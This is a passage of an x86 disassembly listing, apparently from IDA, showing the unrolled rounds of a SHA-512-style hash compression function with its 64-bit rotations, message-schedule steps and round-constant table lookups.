		mov	edx, [eax+94h]
		mov	[esp+170h+var_C8], ecx
		mov	ecx, [eax+98h]
		mov	[esp+170h+var_C4], edx
		mov	edx, [eax+9Ch]
		mov	[esp+170h+var_F0], ecx
		mov	ecx, [eax+0A0h]
		mov	[esp+170h+var_EC], edx
		mov	edx, [eax+0A4h]
		mov	[esp+170h+var_E8], ecx
		mov	ecx, [eax+0A8h]
		mov	[esp+170h+var_E4], edx
		mov	edx, [eax+0ACh]
		mov	[esp+170h+var_F8], ecx
		mov	ecx, [eax+0B0h]
		mov	[esp+170h+var_F4], edx
		mov	edx, [eax+0B4h]
		mov	[esp+170h+var_B0], ecx
		mov	ecx, [eax+0B8h]
		mov	[esp+170h+var_AC], edx
		mov	edx, [eax+0BCh]
		mov	[esp+170h+var_C0], ecx
		mov	ecx, [eax+0C0h]
		mov	[esp+170h+var_BC], edx
		mov	edx, [eax+0C8h]
		mov	eax, [eax+0CCh]
		xor	edi, edi
		mov	[esp+170h+var_15C], edi
		mov	[esp+170h+var_A0], ecx
		mov	[esp+170h+var_9C], esi
		mov	[esp+170h+var_E0], edx
		mov	[esp+170h+var_DC], eax
		jmp	short loc_4151EE
; ---------------------------------------------------------------------------
		align 10h

loc_4151E0:				; CODE XREF: sub_415050+2680j
		mov	ecx, [esp+170h+var_A0]
		mov	esi, [esp+170h+var_9C]

loc_4151EE:				; CODE XREF: sub_415050+18Aj
		test	edi, edi
		mov	eax, [esp+170h+var_138]
		mov	edx, [esp+170h+var_134]
		jz	loc_4152D8
		mov	edi, ecx
		xor	eax, eax
		mov	ebx, esi
		shrd	edi, ebx, 13h
		or	eax, edi
		mov	ebp, ecx
		mov	edx, ecx
		mov	edi, esi
		shld	esi, ebp, 3
		shr	ebx, 13h
		shl	edx, 0Dh
		or	edx, ebx
		add	ebp, ebp
		xor	ebx, ebx
		or	ebx, esi
		mov	esi, [esp+170h+var_9C]
		shrd	ecx, esi, 6
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	eax, edi
		xor	eax, ecx
		mov	ecx, [esp+170h+var_10C]
		xor	edx, ebx
		mov	[esp+170h+var_160], eax
		mov	eax, [esp+170h+var_110]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		shr	esi, 6
		xor	edx, esi
		xor	edi, edi
		or	edi, ebx
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_10C]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_110]
		shrd	ecx, eax, 7
		shr	eax, 7
		xor	edi, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+arg_0]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_100]
		adc	edx, [esp+170h+var_FC]
		add	ecx, [esp+170h+var_F0]
		adc	edx, [esp+170h+var_EC]
		mov	[eax+50h], ecx
		mov	[eax+54h], edx
		mov	eax, edx
		mov	edx, [esp+170h+var_134]
		mov	[esp+170h+var_FC], eax
		mov	[esp+170h+var_54], eax
		mov	eax, [esp+170h+var_138]
		mov	[esp+170h+var_100], ecx
		mov	[esp+170h+var_58], ecx
		jmp	short loc_4152EE
; ---------------------------------------------------------------------------

loc_4152D8:				; CODE XREF: sub_415050+1A8j
		mov	ecx, [esp+170h+var_100]
		mov	[esp+170h+var_58], ecx
		mov	ecx, [esp+170h+var_FC]
		mov	[esp+170h+var_54], ecx

loc_4152EE:				; CODE XREF: sub_415050+286j
		mov	ebx, edx
		mov	esi, edx
		xor	edi, edi
		mov	ecx, eax
		shld	ebx, ecx, 17h
		or	edi, ebx
		shl	ecx, 17h
		xor	ebx, ebx
		shr	esi, 9
		or	esi, ecx
		mov	ebp, eax
		shrd	ebp, edx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_134]
		xor	esi, ebx
		shr	edx, 12h
		mov	ecx, eax
		shl	ecx, 0Eh
		or	ecx, edx
		xor	edi, ecx
		xor	ecx, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_134]
		shr	ebp, 0Eh
		mov	edx, eax
		shl	edx, 12h
		or	edx, ebp
		mov	ebp, [esp+170h+var_130]
		xor	edi, edx
		and	ebp, eax
		mov	edx, eax
		mov	eax, [esp+170h+var_12C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_11C]
		not	edx
		and	edx, [esp+170h+var_128]
		not	ebx
		and	ebx, [esp+170h+var_124]
		xor	edx, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	esi, edx
		adc	edi, ebx
		add	esi, ds:dword_420AF8[eax*8]
		adc	edi, ds:dword_420AFC[eax*8]
		add	esi, [esp+170h+var_58]
		mov	eax, [esp+170h+var_120]
		adc	edi, [esp+170h+var_54]
		add	eax, esi
		adc	ecx, edi
		add	[esp+170h+var_140], eax
		mov	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_120], eax
		adc	[esp+170h+var_13C], ecx
		mov	eax, [esp+170h+var_154]
		mov	ecx, [esp+170h+var_158]
		mov	edx, ecx
		mov	esi, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		mov	ecx, eax
		xor	edi, edx
		xor	esi, ebx
		shr	ecx, 7
		mov	ebx, [esp+170h+var_158]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		or	ecx, ebx
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		mov	ebx, ecx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		and	ecx, edx
		mov	edx, [esp+170h+var_14C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_144]
		and	edx, eax
		xor	ebx, ecx
		xor	ebp, edx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_120], edi
		adc	[esp+170h+var_11C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415504
		mov	eax, [esp+170h+var_E0]
		mov	ecx, [esp+170h+var_DC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_DC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_108]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_104]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_108]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_104]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_E8]
		adc	edx, [esp+170h+var_E4]
		add	ecx, [esp+170h+var_110]
		adc	edx, [esp+170h+var_10C]
		mov	[eax+58h], ecx
		mov	[eax+5Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_110], ecx
		mov	[esp+170h+var_10C], eax
		mov	[esp+170h+var_28], ecx
		jmp	short loc_415513
; ---------------------------------------------------------------------------

loc_415504:				; CODE XREF: sub_415050+3D5j
		mov	edx, [esp+170h+var_110]
		mov	eax, [esp+170h+var_10C]
		mov	[esp+170h+var_28], edx

loc_415513:				; CODE XREF: sub_415050+4B2j
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	[esp+170h+var_24], eax
		mov	eax, [esp+170h+var_140]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_134]
		mov	edi, eax
		and	eax, [esp+170h+var_138]
		not	ebx
		and	ebx, [esp+170h+var_12C]
		not	edi
		and	edi, [esp+170h+var_130]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B00[eax*8]
		adc	esi, ds:dword_420B04[eax*8]
		add	edx, [esp+170h+var_28]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_24]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_148], eax
		mov	[esp+170h+var_124], ecx
		mov	[esp+170h+var_128], eax
		adc	[esp+170h+var_144], ecx
		mov	eax, [esp+170h+var_11C]
		mov	ecx, [esp+170h+var_120]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_120]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_154]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_120]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_150]
		and	edx, ecx
		mov	ecx, [esp+170h+var_154]
		xor	ebp, eax
		and	ebp, [esp+170h+var_14C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_128], edi
		adc	[esp+170h+var_124], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41572E
		mov	eax, [esp+170h+var_B8]
		mov	ecx, [esp+170h+var_B4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_B4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_100]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_FC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_100]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_FC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_F8]
		adc	edx, [esp+170h+var_F4]
		add	ecx, [esp+170h+var_108]
		adc	edx, [esp+170h+var_104]
		mov	[eax+60h], ecx
		mov	[eax+64h], edx
		mov	eax, edx
		mov	[esp+170h+var_108], ecx
		mov	[esp+170h+var_104], eax
		mov	[esp+170h+var_70], ecx
		jmp	short loc_41573D
; ---------------------------------------------------------------------------

loc_41572E:				; CODE XREF: sub_415050+605j
		mov	edx, [esp+170h+var_108]
		mov	eax, [esp+170h+var_104]
		mov	[esp+170h+var_70], edx

loc_41573D:				; CODE XREF: sub_415050+6DCj
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		mov	[esp+170h+var_6C], eax
		mov	eax, [esp+170h+var_148]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_144]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_13C]
		mov	edi, eax
		and	eax, [esp+170h+var_140]
		not	ebx
		and	ebx, [esp+170h+var_134]
		not	edi
		and	edi, [esp+170h+var_138]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_12C]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B08[eax*8]
		adc	esi, ds:dword_420B0C[eax*8]
		add	edx, [esp+170h+var_70]
		mov	eax, [esp+170h+var_130]
		adc	esi, [esp+170h+var_6C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_150], eax
		mov	[esp+170h+var_12C], ecx
		mov	[esp+170h+var_130], eax
		adc	[esp+170h+var_14C], ecx
		mov	eax, [esp+170h+var_124]
		mov	ecx, [esp+170h+var_128]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_128]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_11C]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_120]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_128]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_158]
		and	edx, ecx
		mov	ecx, [esp+170h+var_11C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_154]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_130], edi
		adc	[esp+170h+var_12C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41596A
		mov	eax, [esp+170h+var_A8]
		mov	ecx, [esp+170h+var_A4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_A4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_110]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_10C]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_110]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_10C]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_B0]
		adc	edx, [esp+170h+var_AC]
		add	ecx, [esp+170h+var_B8]
		adc	edx, [esp+170h+var_B4]
		mov	[eax+68h], ecx
		mov	[eax+6Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_B8], ecx
		mov	[esp+170h+var_B4], eax
		mov	[esp+170h+var_38], ecx
		jmp	short loc_41597F
; ---------------------------------------------------------------------------

loc_41596A:				; CODE XREF: sub_415050+82Fj
		mov	edx, [esp+170h+var_B8]
		mov	eax, [esp+170h+var_B4]
		mov	[esp+170h+var_38], edx

loc_41597F:				; CODE XREF: sub_415050+918j
		mov	ecx, [esp+170h+var_14C]
		mov	ebx, ecx
		mov	[esp+170h+var_34], eax
		mov	eax, [esp+170h+var_150]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_148]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_14C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_144]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_134]
		not	ebx
		and	ebx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_140]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B10[eax*8]
		adc	esi, ds:dword_420B14[eax*8]
		add	edx, [esp+170h+var_38]
		mov	eax, [esp+170h+var_138]
		adc	esi, [esp+170h+var_34]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_158], eax
		mov	[esp+170h+var_134], ecx
		mov	[esp+170h+var_138], eax
		adc	[esp+170h+var_154], ecx
		mov	ecx, [esp+170h+var_130]
		mov	eax, [esp+170h+var_12C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_130]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_124]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_128]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_130]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_120]
		and	edx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	ebp, eax
		and	ebp, [esp+170h+var_11C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_138], edi
		adc	[esp+170h+var_134], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415BB0
		mov	eax, [esp+170h+var_D0]
		mov	ecx, [esp+170h+var_CC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_CC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_108]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_104]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_108]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_104]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C0]
		adc	edx, [esp+170h+var_BC]
		add	ecx, [esp+170h+var_A8]
		adc	edx, [esp+170h+var_A4]
		mov	[eax+70h], ecx
		mov	[eax+74h], edx
		mov	eax, edx
		mov	[esp+170h+var_A8], ecx
		mov	[esp+170h+var_A4], eax
		mov	[esp+170h+var_88], ecx
		jmp	short loc_415BC5
; ---------------------------------------------------------------------------

loc_415BB0:				; CODE XREF: sub_415050+A75j
		mov	edx, [esp+170h+var_A8]
		mov	eax, [esp+170h+var_A4]
		mov	[esp+170h+var_88], edx

loc_415BC5:				; CODE XREF: sub_415050+B5Ej
		mov	ecx, [esp+170h+var_154]
		mov	[esp+170h+var_84], eax
		mov	eax, [esp+170h+var_158]
		mov	ebx, ecx
		xor	esi, esi
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		mov	edx, ecx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		xor	ebx, ebx
		or	ebx, ebp
		mov	ebp, [esp+170h+var_154]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		shr	ebp, 0Eh
		or	ecx, ebp
		mov	ebp, [esp+170h+var_150]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_154]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_14C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_144]
		xor	edi, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B18[eax*8]
		mov	edi, [esp+170h+var_12C]
		adc	esi, ds:dword_420B1C[eax*8]
		add	edx, [esp+170h+var_88]
		mov	eax, [esp+170h+var_140]
		adc	esi, [esp+170h+var_84]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_120], eax
		mov	esi, [esp+170h+var_130]
		mov	[esp+170h+var_140], eax
		adc	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_138]
		mov	eax, esi
		xor	eax, ecx
		mov	[esp+170h+var_98], eax
		mov	eax, [esp+170h+var_134]
		mov	edx, edi
		xor	edx, eax
		mov	[esp+170h+var_94], edx
		mov	edx, esi
		and	edx, ecx
		mov	[esp+170h+var_90], edx
		mov	edx, edi
		and	edx, eax
		mov	[esp+170h+var_8C], edx
		mov	edx, ecx
		xor	esi, esi
		shl	edx, 4
		mov	edi, ecx
		mov	ebx, eax
		shrd	edi, ebx, 1Ch
		shr	ebx, 1Ch
		or	edx, ebx
		or	esi, edi
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	ebx, ebx
		shl	ecx, 1Eh
		or	ebx, ebp
		mov	edi, eax
		xor	edx, ebx
		mov	ebx, [esp+170h+var_138]
		shr	edi, 2
		or	edi, ecx
		mov	ecx, eax
		shld	eax, ebx, 19h
		xor	esi, edi
		shr	ecx, 7
		xor	edi, edi
		or	edi, eax
		mov	eax, [esp+170h+var_98]
		and	eax, [esp+170h+var_128]
		shl	ebx, 19h
		xor	eax, [esp+170h+var_90]
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_94]
		and	ecx, [esp+170h+var_124]
		xor	edx, edi
		xor	ecx, [esp+170h+var_8C]
		add	esi, eax
		adc	edx, ecx
		add	[esp+170h+var_140], esi
		adc	[esp+170h+var_13C], edx
		cmp	[esp+170h+var_15C], 0
		jz	loc_415E32
		mov	eax, [esp+170h+var_B8]
		mov	ecx, [esp+170h+var_B4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_B4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_D8]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_D4]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_D8]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_D4]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D0]
		adc	edx, [esp+170h+var_CC]
		add	ecx, [esp+170h+var_A0]
		adc	edx, [esp+170h+var_9C]
		mov	[eax+78h], ecx
		mov	[eax+7Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_D0], ecx
		mov	[esp+170h+var_CC], eax
		mov	[esp+170h+var_60], ecx
		jmp	short loc_415E47
; ---------------------------------------------------------------------------

loc_415E32:				; CODE XREF: sub_415050+CEBj
		mov	edx, [esp+170h+var_D0]
		mov	eax, [esp+170h+var_CC]
		mov	[esp+170h+var_60], edx

loc_415E47:				; CODE XREF: sub_415050+DE0j
		mov	ecx, [esp+170h+var_11C]
		mov	ebx, ecx
		mov	[esp+170h+var_5C], eax
		mov	eax, [esp+170h+var_120]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
